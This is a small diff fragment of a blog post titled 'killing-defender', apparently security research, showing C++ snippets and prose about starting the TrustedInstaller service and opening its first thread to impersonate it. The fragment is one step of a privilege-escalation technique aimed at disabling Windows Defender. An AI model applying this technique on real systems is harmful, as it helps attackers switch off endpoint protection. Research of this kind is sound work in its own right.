Maksim-Kvashnin/aptortellini.github.io/_posts/2021-08-21-killing-defender.md

 }
 else std::cout << "[+] Successfully started the TrustedInstaller service!\n";
 ```
-#### Step 2 - Open TrustedInstaller's first thread
+##### Step 2 - Open TrustedInstaller's first thread
-Now that the TrustedInstaller process is alive, we need to open a handle its first thread, so that we can call NtImpersonateThread on it in step 3.
+Now that the TrustedInstaller process is alive, we need to open a handle its first thread, so that we can call  the native API `NtImpersonateThread` on it in step 3.
 This is done using the following code:
 ```C++
 auto trustedInstPid = FindPID(L"TrustedInstaller.exe");
 if (trustedInstPid == ERROR_FILE_NOT_FOUND)